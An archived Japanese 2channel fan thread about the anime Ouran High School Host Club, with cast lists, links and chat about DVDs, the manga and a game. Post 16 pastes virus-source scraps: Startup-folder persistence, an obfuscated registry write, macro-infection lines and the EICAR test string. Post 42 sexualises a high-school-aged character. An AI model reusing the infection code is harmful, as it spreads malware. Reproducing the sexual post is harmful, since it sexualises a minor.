5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

桜蘭高校ホスト部 指名客50人目

1 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:03:00 ID:nbeH/ewQ
アニマックスにて華麗に営業中!
ttp://www.animax.co.jp/feature/index.php?program=NN10000357

=======================光と馨から重要なお知らせ=======================
・【※実況厳禁】勿論スレあぼーん+懲罰サーバ(スレ運営が困難)送りは俺の役目だよな馨。
・基本的にsage進行(メール欄に半角でsage)で。2chブラウザも好ましいが僕らの場合双子というこの上ない禁断度を武器にしているわけ。
・荒し、煽り、殿は徹底的に放置。いるんだよねーたまに
・次スレは>>970が立てることつーか>>970って何?何かの予防線?立てられない時は代わりを指名か僕が立てるの光?
・ほんとは2人きりで過ごしたかったけどな馨・・・言わないでよ光・・・!!ほんとは僕だって・・・!!
==================================================

2 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:03:43 ID:nbeH/ewQ
@実況(放送時間中の書き込み)は以下の実況板をつかってね。
アニメ特撮実況掲示板(read.cgi終日停止中/2chブラウザ以外では閲覧不能)
http://cha2.sakura.ne.jp/cgi-bin/anitoku/Open

■前スレ
桜蘭高校ホスト部 指名客49人目
http://anime.2ch.net/test/read.cgi/anime2/1166112721/

日テレ公式
ttp://www.ntv.co.jp/host/
白泉社公式
ttp://www.hakusensha.co.jp/host_anime/contents/anime/index.html
VAP公式
ttp://www.vap.co.jp/host/index.html
BONES公式
ttp://www.bones.co.jp/hosto_yota/index.html
まとめサイト
ttp://anime.geocities.jp/ootoroharuhi/
まとめWiki
ttp://www15.atwiki.jp/hostclub/


3 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:04:33 ID:nbeH/ewQ
◆スタッフ
原作:葉鳥ビスコ(「月刊LaLa」白泉社刊)
監督:五十嵐卓哉
シリーズ構成:榎戸洋司
キャラクターデザイン・総作画監督:高橋久美子
美術デザイン・美術監督:中村典史
色彩設計:中山しほ子
音響監督:若林和弘
音楽:平野義久
撮影監督:瓶子修一
製作著作:NTV・VAP・BONES・白泉社

◆キャスト
藤岡ハルヒ:坂本真綾
須王環:宮野真守
鳳鏡夜:松風雅也
常陸院光:鈴村健一
常陸院馨:藤田圭宣
埴之塚光邦:齋藤彩夏
銛之塚崇:桐井大介


4 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:05:19 ID:nbeH/ewQ
原作スレ
【桜蘭高校ホスト部】葉鳥ビスコ16【千年の雪】
http://comic6.2ch.net/test/read.cgi/gcomic/1162992496/l50

桜蘭高校ホスト部の声優を語るスレ
http://anime.2ch.net/test/read.cgi/voice/1147164609/l50

↑以外のホスト部関連のスレはこちらで
http://find.2ch.net/?BBS=2ch&TYPE=TITLE&STR=%BA%F9%CD%F6%B9%E2%B9%BB%A5%DB%A5%B9%A5%C8%C9%F4&COUNT=50



5 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:06:10 ID:nbeH/ewQ
FAQ

Q原作面白い?
A 知らんがな。
 原作とアニメは展開は同じだが微妙に演出が異なる。
 原作にあってアニメにない場面もあればその逆もある。

Q原作よりアニメのが面白くね?
A原作とアニメの比較はほどほどに。

QドラマCDのキャストじゃないの?
A見れば分かるだろ。

QドラマCDのキャストのが面白い
AそれならドラマCD聴いてなさい。ここはアニメスレ。

Q提供ないの?
A日テレがお金を出してくれているので「ない」です。

Q何クール(全何話)?
A全26話(2クール)。DVDは全9巻。

Q第1話のイジメっ子(綾小路)の声って誰?
A根谷美智子。なぜかクレジットにはなし(DVDにはあり)

Q原作ネタバレおk?
Aネタバレスレでしてね。
桜蘭高校ホスト部 ネタバレ客用スレッド6
http://anime.2ch.net/test/read.cgi/asaloon/1158687298/l50

6 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:18:59 ID:YrMsemLZ
>>1乙!

7 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:29:15 ID:zYG7uX4b
>>1
キスキスフォーリン乙!

8 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:40:48 ID:URYEtEOD
>>1
双子乙!

9 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:41:31 ID:gp5LUQbH
>>1
乙華麗!

つ 大トロ

10 :名無しさん@お腹いっぱい。:2007/01/18(木) 08:06:11 ID:QyvsxaEW
>>1
桜オッツ!
そして双子ワロタw

11 :名無しさん@お腹いっぱい。:2007/01/18(木) 08:12:58 ID:DCGqZLN6
>>1
光馨 乙です!
笑えるwww

12 :名無しさん@お腹いっぱい。:2007/01/18(木) 09:40:37 ID:3oK/vg1c
>>1
乙。しかし殿は放置せん、放置せんぞ!

前スレ>>989
殿のだけ入ってんの?それもなんだか凄い…w
ああいうのってどういう基準で入るんだろうな

13 :名無しさん@お腹いっぱい。:2007/01/18(木) 13:31:44 ID:OGja1dDL
>>12
大抵はリクエスト
数が多いと採用

14 :名無しさん@お腹いっぱい。:2007/01/18(木) 13:40:37 ID:DonkUltn
歌舞伎町ホストクラブ、脱税=無申告の経営者告発−東京国税局
http://headlines.yahoo.co.jp/hl?a=20070118-00000065-jij-soci

ホスト店元オーナーが脱税 2億円所得隠し、国税告発
http://www.47news.jp/CN/200701/CN2007011801000261.html
2007年01月18日 12:06 【共同通信】

東京・歌舞伎町で複数のホストクラブを経営していた鳥山敦史・元オーナー(34)が
2004年までの2年間に約2億円の所得を隠し、約7000万円を脱税したとして、
東京国税局が所得税法違反容疑で東京地検に告発したことが18日、分かった。

関係者によると、鳥山元オーナーは大阪でのホストクラブ勤務を経て01年ごろから
歌舞伎町でホストクラブの個人経営を始めた。開店した店はいずれも人気店となったが、
自身の所得は全く申告していなかったという。所得は複数の従業員名義の預金口座に隠していた。

05年12月、東京国税局の強制調査(査察)を受けた際、自宅に大麻を所持していたことが判明。
警視庁に大麻取締法違反容疑で逮捕され、東京地裁で06年2月、懲役1年、執行猶予3年の判決を受けた。

15 :名無しさん@お腹いっぱい。:2007/01/18(木) 14:21:22 ID:1S5/ynlF
前スレ>>998-1000

そろそろウイルス貼る人が来るかな

16 :名無しさん@お腹いっぱい。:2007/01/18(木) 17:19:21 ID:R34Iqfkt
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


17 :名無しさん@お腹いっぱい。:2007/01/18(木) 17:20:38 ID:rBbGjrup
1話の実況で、ハルヒが女と分かったあたりの過去ログってどこかにありますか?
にくちゃんねるでもそこだけ抜けてるみたいで・・

18 :名無しさん@お腹いっぱい。:2007/01/18(木) 18:08:06 ID:n9WZb5yT
>>1先輩!お疲れ様です!

19 :風の谷の名無しさん@実況は実況板で :2007/01/18(木) 18:49:39 ID:99w+iMbD
>>1
右手左手振りかざして闇を切り裂いて乙
次はモリ先輩あたりか?

20 :名無しさん@お腹いっぱい。:2007/01/18(木) 19:52:05 ID:DCGqZLN6
でもモリ先輩だと難しそうだね。
台詞ほとんど「ああ」とか「光邦」とか「・・・」でw
長いのって12話の
「光邦、人や物にあたるな〜〜総入れ歯になったら俺は・・」
ぐらいかwww

21 :名無しさん@お腹いっぱい。:2007/01/18(木) 20:09:05 ID:pfNJXpru
ハニー先輩vsチカの時の解説も長セリフだぜ

22 :名無しさん@お腹いっぱい。:2007/01/18(木) 20:31:37 ID:miVdWT0z
きっとモリ先輩ならこう言う。
「環」(無言で頼む)

23 :名無しさん@お腹いっぱい。:2007/01/18(木) 20:52:43 ID:Anf6l+bk
大穴でれんげ嬢かチカ

24 :名無しさん@お腹いっぱい。:2007/01/18(木) 20:59:22 ID:MEdIOuAP
>>1
ヒカちゃん、カオちゃんお疲れ様〜。

次は環パパ、鏡夜パパ、蘭花パパに期待。

25 :名無しさん@お腹いっぱい。:2007/01/18(木) 21:49:21 ID:7BiKopxH

ぱっと見「かん」と読む俺はまだまだですね

26 :名無しさん@お腹いっぱい。:2007/01/18(木) 22:41:10 ID:DQDyUhPN
>>1のテンプレは>>2のまとめサイトにあることを知らない人も多いのかな?
ttp://anime.geocities.jp/ootoroharuhi/

モリバージョンもちゃんと用意されてるよ

27 :名無しさん@お腹いっぱい。:2007/01/18(木) 23:25:56 ID:n9WZb5yT
=========理事長からの重要なお知らせ============
・【※実況厳禁】勿論スレあぼーん+懲罰サーバ(スレ運営が困難)送りだ!もしくはこのお・じ・さ・まにそうんだんしなさい。
・基本的にsage進行。メール欄に半角で「sage」を入れろ!IEとは馴れ馴れしい。2chでは2chブラウザを使え!
・荒し、煽り、殿は徹底的に放置だぞ。釣られるのは高くつくものだ…。このスレに居ると言うことは好きな事を自由に言えないことでもある。
・次スレは>>970が立てることだ。お前はこれからどうしたい?誰かを指名する…それは難しい選択だぞ。
・理事長とは水臭い。そう…お・じ・さ・まと…呼んでくたまえ。
==================================



がんばってみた。

28 :名無しさん@お腹いっぱい。:2007/01/18(木) 23:28:14 ID:bhewWQ9A
>>27
殿はおかしくないか?

29 :名無しさん@お腹いっぱい。:2007/01/18(木) 23:33:00 ID:wWrxAfa3
>>28
初めてじっくり読んだんだが
その゛殿゛の意味をおせーて下さい

30 :27 :2007/01/18(木) 23:43:45 ID:n9WZb5yT
アウチ。
すまん、双子の文をコピーしたから残ってた・・・。
脳内削除してください…。

31 :名無しさん@お腹いっぱい。:2007/01/19(金) 00:56:25 ID:ZFvx39S9
いやいや、なかなかGJだと思うぞ。乙!『殿』は『環』とか『我が愚息』とかにしては。

32 :名無しさん@お腹いっぱい。:2007/01/19(金) 08:10:13 ID:aEtSYV1N
なんという殿・・・
ちょっと罵ったらすぐに部屋の角にうずくまってしまった
俺は間違いなくこいつが好き

   / ̄\
  | ^o^ | <殿と徹平なら掘れる
   \_/


33 :名無しさん@お腹いっぱい。:2007/01/19(金) 14:23:37 ID:Xu1Mrmlo
殿が「俺はラブコメ要員であって、ホモホモ要員じゃない!」と泣いて怒るぞ。
理事長テンプレは親バカとお茶目さが全然ないな…アニメじゃ出なかったら仕方ないかあ

34 :名無しさん@お腹いっぱい。:2007/01/19(金) 15:02:04 ID:qen0Y9IB
>>33

スレ違いだけど、漫画まだ連載してるの?

35 :名無しさん@お腹いっぱい。:2007/01/19(金) 15:08:48 ID:CzHDbwLs
連載してマス〜

36 :名無しさん@お腹いっぱい。:2007/01/19(金) 15:56:33 ID:5IL5L3SP
新 ス レ  グ ッ ジ ョ ブ !!   >>1

    . -―ヽ ̄ \\                /l, -― z__
  ∠...  , -―― 、 '⌒.ニ=‐       ‐=ニヽ/ , -―- 、  _\
  /.  /  . ., -  ⌒ヽ \      / , - 、/  、.   \  \
 フ. ., '  // .  i i . ハ `く     _フ . / . i |   \   ヽ  Z
イ: : // ///イ: ,//メ:i: ハ: . ニ=‐ <_: : / . l メヽト、 :ト、\:\: : ヽ: .\
Z: :ィ:, :‐/メ、/' ノ‐ '´/ V: : l: _>   <_:{ : |/ \ヽl \|\:メ: :l:i:ト: :Z
<: l:{: :l _`   '´_ V: :ムZ     Zハ: :/ __ `'  ゙´_ ヽl: |:リ ≦
 ≧、、 l 〒〒    〒〒ノノV       Yヘl 〒〒    〒〒l: lム/
 __{ {ヽi ゝノ   i  し' ´i ノム_    , --ゝハ ゝノ  i    し' lソ, }
..{ ゝ-ヘ``` 、___,```/ 〃{  |   {^ヽ::ゝヘ´´´、___,´´´ム〃⌒,
ハ  ゝll> .      /:V 」 ノ    ハ  ヽll>        ∠::/  ,
  ,  < f‐ 、::> __ イf⌒レノ  {    ハ   ll_ll_l> __ イ llll/  /
  i  lハ  }>ヽ____ノハ  {ト   ハ     }   {^ヽ弋` ´ ̄ノノ^>  ハ
. ハ ゝ' ┴ 、ヽ /:::r┴‐く. ハ      |   l|  ト、`¨¨¨´イ| {   ハ
.  ハ {/    〈-ヱ-.〉   '、} l       l 厂厂 ̄`V〒テl,-┴┴r、 ハ
   l ゝ    }   ハ    ノ' l        ハ 〈    〈 ((_)) j    } !
   ゝ ゝ___ノー―.へ_ノ_ノ       ゝゝ   } ゝソ {    j}ノ
   / ̄    、__二ニ=/ l、         `ゝ┬彳 ゝ >┬彳
  ハ           / ハ         /| l  l\{  ノ | l |

37 :名無しさん@お腹いっぱい。:2007/01/19(金) 15:59:32 ID:5IL5L3SP
ふぅ、久々に新スレ立ってて驚いた。

>>34
つかまだまだ人気ありすぎで困る。
一冊あたり300円以上で売れてる(ヤフオク)
一冊200円くらいで落札しようと狙ってるのによ、値段テラタカスクリニック


38 :名無しさん@お腹いっぱい。:2007/01/19(金) 17:14:24 ID:fcUQBLo6
一冊300円とかありえないな
普通に新品買うわ

39 :名無しさん@お腹いっぱい。:2007/01/19(金) 17:55:17 ID:CjEH2gFY
近所のブックオフに1冊もなくて吹いた

40 :名無しさん@お腹いっぱい。:2007/01/19(金) 18:03:30 ID:snmP4yj6
>>39
同じくw GEOにもなかったよ
結局9冊新品で買った

41 :名無しさん@お腹いっぱい。:2007/01/19(金) 19:02:58 ID:nzFVZo7o
私も新品で買ったよ。
元々こんなに人気だったの?
それともアニメ化の影響でこうなったの?

42 :名無しさん@お腹いっぱい。:2007/01/19(金) 19:06:24 ID:x1/Tdxjk
ハルヒたんのおしっこくさいパンティの匂いをくんくんしたいよ・・・。
ハルヒたんのアヌスの匂い、嗅ぎたい・・・。
ハルヒたんってまだ清らかなままだよね・・・。
ああ、ハルヒたんのおなか舐めたいよ・・・。


43 :名無しさん@お腹いっぱい。:2007/01/19(金) 19:47:29 ID:0NH6Kf6g
さっき…夢を見た……


俺(ハルヒ?)が鏡夜と一緒に殿の家に遊びに行く夢だった……
楽しかった………

44 :名無しさん@お腹いっぱい。:2007/01/19(金) 20:34:26 ID:aEtSYV1N
>>26
まとめサイトにもないやつあるよ
つ低血圧魔王様

=======================低血圧魔王様から重要なお知らせ=======================
・【※実況厳禁】スレあぼーん+懲罰サーバ(スレ運営が困難)送りだ。パスポートは持っているだろうな?
・基本的にsage進行(メール欄に半角でsage)だ。2chブラウザの使用が推奨されるのも
 当然のことだな。
・荒し、煽りは徹底的に放置。俺はどうでもいいが双子を止めるのに苦労するだろうな。
・次スレか、、、しかたない、条件を付けるぞ。>>950が立てること。いいな。
・スレ立てにもいいかげん飽きがきてるんだよ。このマンネリ人間め。あとは好きに。。。
 しろ。。。コテ
==================================================
@好きにしてイイの?イイの?よし!実況(放送時間中の書き込み)は以下の実況板を使うぞ、皆の衆!
 あぁ、それこっち!ううん、ちがう、そう、こっち!


ってやつ
多分32スレ目の1さんが作ったと思われ


>>27
職人候補GJ
書き直して使えばぉk

ボサノバverってあったっけ?

45 :名無しさん@お腹いっぱい。:2007/01/19(金) 21:19:08 ID:9jpAYcfq
ホスト部制作ヨタ日記ラスト更新キタ━━━━ヽ(゚Д゚)ノ━━━━ !!!!!
やぶさん生きてたよw
7ヶ月ぶりの更新で環コスw

46 :名無しさん@お腹いっぱい。:2007/01/19(金) 21:27:27 ID:KuelK7Mi
殿じゃねえええええええ

47 :名無しさん@お腹いっぱい。:2007/01/19(金) 21:57:00 ID:aEtSYV1N
>>45
吹いたwwwwwwwwwポン酢テラアホスwwwwwwwwwwwwwww

でもそれだけ去年のポン酢内でもホスト部は良い作品だったってことかな
やぶ氏ヨタ日記乙でした

48 :名無しさん@お腹いっぱい。:2007/01/19(金) 22:27:28 ID:BdbnL3p4
せっかくのハニー先輩メインなのに、どこか可愛さが足りない気が…?


でも、虫歯回の疾走の間奏アレンジからの繋ぎは神!

49 :名無しさん@お腹いっぱい。:2007/01/19(金) 22:31:52 ID:0C5/w1+m
うちの近所のTSUTAYAは小規模で桜蘭のDVDは2枚つづしか
置いてないんだけど、準作落ちの分は全部貸し出しになってて
嬉しかったww


50 :名無しさん@お腹いっぱい。:2007/01/19(金) 22:45:22 ID:ta3Jz+Ie
>>41
元々NANAのだめフルバ辺りの超クラスの次に売れてるクラスに入る。7巻で550万部いってたし。
だからこそスタッフもしっかり固められたのかと。

51 :名無しさん@お腹いっぱい。:2007/01/20(土) 00:10:04 ID:GCS40SkR
>>41
当然。
少女漫画を好んで買うアニヲタ以外は、存在さえも知らなかったし

52 :名無しさん@お腹いっぱい。:2007/01/20(土) 00:36:17 ID:VKXeZOsI
今更だが
右手左手振りかざして>>1を切り裂いて乙

>>50>>51が正反対のことを言ってないか?

53 :名無しさん@お腹いっぱい。:2007/01/20(土) 00:40:38 ID:GCS40SkR
>>52
原作が売れてるから人気出た要素もあるだろうけど
アニメの力のほうが圧倒的に強いだろどうみても、
やたらアニヲタの評価高かったし。
アニメ板で評価がマンセーばかりのアニメスレってのも珍しかった


54 :名無しさん@お腹いっぱい。:2007/01/20(土) 00:43:42 ID:3ayA0EdF
ここの住人は当然4月頃出るPS2のゲームも買うよな?

55 :名無しさん@お腹いっぱい。:2007/01/20(土) 00:53:22 ID:KlJbaw+C
買いますが何か

56 :名無しさん@お腹いっぱい。:2007/01/20(土) 01:07:27 ID:wc2OsC7m
>>53
もともと少女漫画読みの間では人気だったのが、アニメ化で更に
客層が広がった感じじゃないかな。

57 :名無しさん@お腹いっぱい。:2007/01/20(土) 01:34:42 ID:1tngPrWT
>>45
!!!11 1wwwww

58 :名無しさん@お腹いっぱい。:2007/01/20(土) 01:37:25 ID:iSt8EtH2
>>45
情報ありがとう

59 :名無しさん@お腹いっぱい。:2007/01/20(土) 01:49:40 ID:nBnY4/PC
>>53
いや…そりゃアニメで知った輩は全てにおいてアニメが絶対だろうが
>>50のデータは客観的事実で、アニメ評価と>>41の「原作が中古で見つからない」は結びつかない。
アニメ評価が漫画にも影響するならウテナやどれみは?って話でさ。
たまたま一年前にはまって集めたけど当時も中古はなかったよ


60 :名無しさん@お腹いっぱい。:2007/01/20(土) 07:59:45 ID:H3UZYs8m
今日センター試験らしいけど
ホスト部のみなさんなら裏口入学だろ?

61 :名無しさん@お腹いっぱい。:2007/01/20(土) 08:25:21 ID:pqDxwDwi
そんな事しなくても、みんな学年5番以内の頭脳の持ち主だから受かる

62 :名無しさん@お腹いっぱい。:2007/01/20(土) 10:15:27 ID:CkdxRdgn
「センター?庶民テスト?なにそれ・・・」
「へー面白いじゃん、鉛筆で塗りつぶすんだー」

63 :名無しさん@お腹いっぱい。:2007/01/20(土) 15:06:16 ID:Ls+Ug3RC
今日久しぶりに渋谷のメイト行ったらホスト部設定資料集が
1・2両方あったよ。
特に1が買えなかった人が結構いたみたいだし、
近い人は寄ってみたらどうでしょう。
これって増刷したのかな?

64 :名無しさん@お腹いっぱい。:2007/01/20(土) 16:02:11 ID:cJXCjj4r
皆様〜、れんげがまいりましたわよ〜〜〜〜
PC用
ttp://www.dmm.com/mono/dvd/-/detail/=/cid=n_622vpby12621
携帯用
ttp://mobile.dmm.com/mono_detail.php?ev_lresize=1&DMMID=57045b1bb13f3a3e&lc_id=1&gd_id=n_622vpby12621

65 :名無しさん@お腹いっぱい。:2007/01/20(土) 16:07:07 ID:Z3aHActj
いままでの裏イラストのような表イラストw

66 :名無しさん@お腹いっぱい。:2007/01/20(土) 16:12:02 ID:iSt8EtH2
まぁれんげも可愛いこた可愛いからな

67 :名無しさん@お腹いっぱい。:2007/01/20(土) 16:55:26 ID:SQlDRNHY
八巻はれんげ人形か
九巻はハルヒ人形女子制服バージョンかな?

68 :名無しさん@お腹いっぱい。:2007/01/20(土) 17:10:25 ID:7UWMSL7A
ジャケのれんげちゃん凄いなぁ。9巻のハルヒ女子制服ver.に期待しよう。

69 :名無しさん@お腹いっぱい。:2007/01/20(土) 19:27:14 ID:1P3EmssV
貧乏なのでDVD1しか買えてないorz
付録ドラマCDじゃ、ホスト部分が足りなくなってきた。
枯れてしまうようおぉぉうぉう!!!!



れんげくんを抱き締めたいのに!!

70 :名無しさん@お腹いっぱい。:2007/01/20(土) 20:00:31 ID:kJbe4Q2k
センター1日目を終えた俺がやってきましたよ
直前まで疾走聴いてたら、なかなか出来たと…思う

71 :名無しさん@お腹いっぱい。:2007/01/20(土) 20:09:27 ID:zZg4b72Z
       ヽ(・ω・)/   ズコー
      \(.\ ノ


72 :名無しさん@お腹いっぱい。:2007/01/20(土) 20:18:07 ID:bRgDOvz5
>>64
画像直なら、両方貼る必要なくね?
ttp://pics.dmm.com/mono/movie/n_622vpby12621/n_622vpby12621ps.jpg

73 :名無しさん@お腹いっぱい。:2007/01/20(土) 20:49:42 ID:FLBSLTzi
>>70
お疲れ様。
>>71がバナナで滑った殿に見えた

74 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:03:32 ID:ifSNaoxm
そういや、さっき2ちゃん落ちたよな。

75 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:59:01 ID:gM1tKgCn
マジでか

76 :名無しさん@お腹いっぱい。:2007/01/21(日) 00:18:36 ID:p92E+H22
ゲームスレに新キャラの情報(殿の親友)があったよ。


77 :名無しさん@お腹いっぱい。:2007/01/21(日) 01:08:46 ID:8RBQyphR
kwsk

78 :名無しさん@お腹いっぱい。:2007/01/21(日) 02:03:44 ID:o2E1U8Rx
猫澤とボサノバのジャケが見たかった

79 :名無しさん@お腹いっぱい。:2007/01/21(日) 02:12:29 ID:VSOZNarv
乙女@桜蘭高校ホスト部  Part2
http://game12.2ch.net/test/read.cgi/ggirl/1168418664/

80 :名無しさん@お腹いっぱい。:2007/01/21(日) 02:22:20 ID:8RBQyphR
↑うわぁ・・・なんて殺意に満ちたスレなんだ。

それに比べてここは・・・。

このスレの住民。ありがとう。

81 :名無しさん@お腹いっぱい。:2007/01/21(日) 02:28:08 ID:obbOBwQu
>>78
脳内で描けばイインダヨー
倉賀野さんとベルゼネフも欲しかった

82 :名無しさん@お腹いっぱい。:2007/01/21(日) 06:03:17 ID:NCIPPOiL
おもいきって原作見てみたけど
少女漫画を見慣れてないせいかいまいち好みじゃなかった
アニメ版はいい感じにアクを抜いて旨味抽出してたんだなあ

83 :名無しさん@お腹いっぱい。:2007/01/21(日) 06:57:50 ID:M+efv7eQ
アニメのEDは曲と映像が最高にマッチしてるよな

84 :名無しさん@お腹いっぱい。:2007/01/21(日) 09:27:06 ID:02Pv9qqL
>>82
逆にアニメ独特の臭みもついてるよ。
最終回は特に。

85 :名無しさん@お腹いっぱい。:2007/01/21(日) 14:24:33 ID:mb1kM00r
アクとか臭みとかやめようぜ


86 :名無しさん@お腹いっぱい。:2007/01/21(日) 15:23:47 ID:HMC+urGx
具体的な批評ならいいんじゃね?
今現在好きすぎて粗が見えない身としては冷静な感想に興味あり

87 :名無しさん@お腹いっぱい。:2007/01/21(日) 15:42:46 ID:VSOZNarv
原作とアニメのどっちがいいとかいう話をしだすと、たいていロクな展開にならない

88 :名無しさん@お腹いっぱい。:2007/01/21(日) 15:53:53 ID:9WQbVxRS
さっきホスト部6話を見終えたとき母が面白いなかにいい話があるんだね続きが気になるから見よう
と言ってくれた、この一言だけでもすごく嬉しかった
世代をとわず楽しめるアニメっていいね

チラ裏すまそ

89 :名無しさん@お腹いっぱい。:2007/01/21(日) 16:03:35 ID:on2I6r7p
>>88
いい親子関係だ、うらやましいわ
つーか俺一人暮らしだからそういうの味わえない

蛇足だが>>88は少し読みづらいから
改行の仕方変えるとか「」を使うとかするともっと読みやすくなるゾw

90 :名無しさん@お腹いっぱい。:2007/01/21(日) 16:04:20 ID:on2I6r7p
またageてしまった

91 :名無しさん@お腹いっぱい。:2007/01/21(日) 16:31:51 ID:9WQbVxRS
>>89
見づらくてごめん
忠告ありがとうw気をつけます

92 :名無しさん@お腹いっぱい。:2007/01/21(日) 16:59:28 ID:p92E+H22
>>63
渋谷のアニメイトにはスティックポスターはまだあるのかな?
秋葉原しか行ったことないんだけど、売り切れてしまった。

93 :名無しさん@お腹いっぱい。:2007/01/21(日) 17:12:28 ID:3Dr9ByXR
今日イトコから聞いた話ね(7歳の子供いる)

児童館で働く女の先生がホスト部のファン!
深夜放送やってた時代に毎回ビデオに撮ってたそうだよ
このアニメ面白いから〜って児童館で小学生達に見せてるそうなんだけど
双子の兄弟愛ネタは小学生にはどう映っているのか少し不安w
ビデオが始まると泣いていた子も大人しくなり、TVの前に集まってチビっ子達は夢中だとか。
ホスト部員は大人気みたい

んで、私もそれ聞いて嬉しくなっちゃってw
でも肝心のイトコはホスト部を見たことないんだ、これが
私もオタなもんだから、携帯に全員分の画像を持ってるからそれ見せたw
そしたら殿がカッコイイ!と言っていて、DVDを貸す約束をしますた
殿さすがだよww

そんでホスト部について熱く語っていたら甥っ子が携帯の画像を見て、
「お母さん!これハルちゃん!本当は女の子」
「この人達はヒカちゃんとカオちゃって名前で〜」(でも双子の区別はついていないw)
「これはタマちゃんって人、この人はきょうちゃん」

ハニー先輩の呼び方は覚えやすいようで、ホスト部員をハニー呼びで言っていたw
でもその小学生はハニー先輩は「ハニー先輩」と呼んでいたのに、
モリ先輩の事は「タカシ」って言ってたから、ハニー先輩の影響を受けてると思われw

タマちゃんはハルちゃんが好き、ハニー先輩はうさちゃんが好き
って言っていたから小学生にでもちゃんと把握出来てるアニメなんだなwww
チラ裏だし長文ごめん、思わぬ楽しい時間を過ごしたから書き込みしてしまった
ホスト部最高〜!!

94 :名無しさん@お腹いっぱい。:2007/01/21(日) 17:14:13 ID:3Dr9ByXR
あげてしまったorz

95 :名無しさん@お腹いっぱい。:2007/01/21(日) 17:24:42 ID:VuCy8ltG
こうして
「しゅちにくりん」とか
「ぎゃくはーれむ」とか
広まっていくんだなぁ……

96 :名無しさん@お腹いっぱい。:2007/01/21(日) 17:34:06 ID:M+efv7eQ
スレは違うが、今週のファミ通にゲームが4月発売だと。プレイ画像もちらっと。指名率とか出るらしく、本格的ホストゲーム?

97 :名無しさん@お腹いっぱい。:2007/01/21(日) 18:43:35 ID:8RBQyphR
それじゃあ、シャンパンコールww?

98 :名無しさん@お腹いっぱい。:2007/01/21(日) 20:42:06 ID:L7Hq0TXG
>>92
ごめんね、急いでいて新商品コーナーとホスト部コーナーしか
見てなかったから、スティックポスターがあったか分からないです。
(前に見た時(12月)はトレカとスティックポスターは違う売り場に置いてあった)

99 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:23:43 ID:vWgVXuMa
ハルヒ父とハルヒ母の出会いってどんなんだったのか気になるな

100 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:42:18 ID:80IXiLqN
>>96
ゲーム出るのかw
これはいったい婦女子層になるのかアニヲタ層になるのかどっちだろう

101 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:42:35 ID:udSZ6+ef
そりゃ〜涼二パパの一目ぼれじゃないのかw?
ノリ的に。
一目ぼれじゃなくても、パパがアタックしてそう。
ほら、蘭花さんと環にてるし。
勝手な想像@。

102 :92:2007/01/21(日) 23:20:33 ID:p92E+H22
>>98
どうもありがとうございます。渋谷はお店が広そうですね。
渋谷に行ったら寄ってみます。

103 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:15:33 ID:J7+kNHjp
ハルヒのだれにもなびかない性格にむかついた。
あんなイケメン達に囲まれて奪い合いされてるのに
何様だよ、この女。男の俺でもうらやましい!!

104 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:22:59 ID:TthDDoMA
GEOにホスト部が無かったのでブチ切れた。








でも、店員の態度がよかったから許す

105 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:25:39 ID:xFXv44h4
>>101
確か原作の方では涼二の一目惚れだったような。
学歴厨じゃないけど、中卒とヤリ手弁護士がどのようにして出会ったのか気になるな……

106 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:31:28 ID:xFXv44h4
>>93
読んでるこっちも嬉しくなっちゃったよ

107 :名無しさん@お腹いっぱい。:2007/01/22(月) 01:09:35 ID:6x3xKRBe
>>93ナゲェヨ!

…と思いつつ読み終わってムフフと

108 :名無しさん@お腹いっぱい。:2007/01/22(月) 03:22:47 ID:TthDDoMA
エトワール嬢は人気ないのかな?

個人的には良いやつだと思うんだけど。

109 :名無しさん@お腹いっぱい。:2007/01/22(月) 03:25:28 ID:K88Q5Vub
>>108
エトワールって誰?
エクレールの間違いじゃね?w

110 :名無しさん@お腹いっぱい。:2007/01/22(月) 03:33:19 ID:97F9tvYL
エクレール・トネール嬢だっけ
あのひと嫌いだわ

ただ彼女に関してひとつ違和感を感じたのは、環のお母さん(エクレールの家政婦)と
話しているときに家政婦である環のお母さんが椅子に座っているのにエクレールが後ろに
立って話を聞いている(?)シーン。多分最終話で出てきたシーン。
家政婦として雇っているとはいえやっぱり環のお母さんほどの人物だから丁重に扱ってた
のかな?と思った。

でもあのひと嫌いだわ・・・環をみんなから、そして俺から奪おうとしたから

111 :名無しさん@お腹いっぱい。:2007/01/22(月) 03:51:58 ID:f7AiVL+L
>>93
ホストというタイトルだけで子供に見せてもいいもんかと一瞬迷うんだけど、
実際に見せても内容は何の問題も無いどころか、むしろ見て欲しい良い話多いんだよね。
